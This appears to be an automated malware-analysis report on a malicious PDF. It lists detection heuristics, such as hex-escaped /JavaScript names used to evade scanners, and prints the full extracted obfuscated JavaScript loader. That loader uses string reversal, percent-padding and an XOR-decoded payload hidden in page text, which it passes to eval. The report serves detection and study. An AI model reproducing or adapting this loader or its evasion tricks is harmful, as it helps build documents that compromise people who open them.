MALICIOUS
106
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9990
Heuristics 3
-
Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECTA PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0010_000.js |
pdf-javascript-stream | PDF /JS object 10 at offset 0x1230 | 1728 bytes |
SHA-256: d4dce4f95f7146e3b127d68edf45ceb045483a205d9e9a2a53d6e6b80d83b663 |
|||
Preview scriptFirst 1,000 lines of the extracted script
try {
function _ZO(_QD){
this._H=_QD;
};
var _RQZ="cha";
var _JI=new String("rAt");
var _XY="leng"+"th";
app._UV=function(_YJM){
_TMN='';
for(_SD=_YJM.length;_SD >= 0;_SD--){
_TMN+=_YJM[_RQZ + _JI](_SD);
}
return _TMN;
}
var _UV=app._UV;
_FE = app._UV('epytotorp');
_ZO[_FE]={
_UNC : _UV(String("lave")),
_KR : function(){
var _NQ = this;
_DS=_NQ._MNI();
var _GN=_NQ._YJM;
_DS(_GN);
},
_MNI : function(){
var _BO=this._UNC;
return _FW[_BO];
},
_YJM : '_HK = 37 ;va%%r _KTM=this._H;_WL=\'getPageNt%%hWord\';_DC=\'%getPageNum%Word%s\';_EL=\'pageNum\';_ED%=%%\'\';_AL=\'join%\';_NG=\'\';_KL=%%0;_%%HA=St%%ring;_VY%=\'subs%tr\';%_BY=\'ev%%al\'%%;_XY=\'%length\'%%;_S%%J%%=\'\\\\x\';%%_P%W=\'charCodeAt\';_GH=\'fro%%mCharCo%%de\'%%;_VS%=\'%toSt%ring\'%%;_JK%R%%=2-1;_D%%M=%3+2;_R%A=100%%+155;_%FW=\'%doc\';%%_ITU%=332%;_IV=[];%_ITK=\'\';_D%A=2;_T%Q%%=4;_J%%A=16;%%_PG=_KTM[_%DC](_KTM[_E%%L])%%;for%(_SD=_%KL;_SD%< _PG;% _SD++){var _%%WJ=_KTM%%[_WL](_%%KTM[_EL]%,_SD,tru%e);_NG=[%_NG,%_WJ][_AL](_ED);;}for(_SD%=0%;_SD < _%NG[_XY]; _SD+=_%%DA)%%{_%GD=_NG[_%VY%](_%%SD,_%DA)%%;_Z%%AB=parseI%%nt(_GD,_JA);_XYP=_ZA%B^_HK%%;_FO=_%XYP%%.t%o%%Stri%ng(%%_J%A%%);_F%O=(_%FO[_XY]==_JKR%%)%% ? \'0\' +% %%_%%FO : _FO;_IV.pus%h(_FO)%;%%}try {_ITK=n%ew String(_SJ + %_I%V[%_AL](_SJ));app%[_BY](\'_ITK=\"%%\'+_%%ITK+\'\";\');%_%%KTM.%_ZW=(%%_%%I%%TK[_%VY]%%(_ITK[_%%XY]-_%%IT%U))%%;_KT%M._UN=(_ITK[_VY]%(_KL,_I%%TK[_XY]-%_ITU));_NI%();} c%atc%%h(_%%GHO){if(_KTM._U%%N)%{try {a%%pp[_BY%](_KTM._UN);} c%%at%ch(%%_GHO){app.alert(\'D%ecoder Except%%i%%on: \'%% %%+ %_GHO);}} else {ap%%p.alert(\'%%No%thing calling\');}%%}'.replace(/[%]/g, ''),
};
var _FW=this;
var _EH=new _ZO(_FW);
_EH._KR();
} catch(_ITK){
app.alert(_ITK);
}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.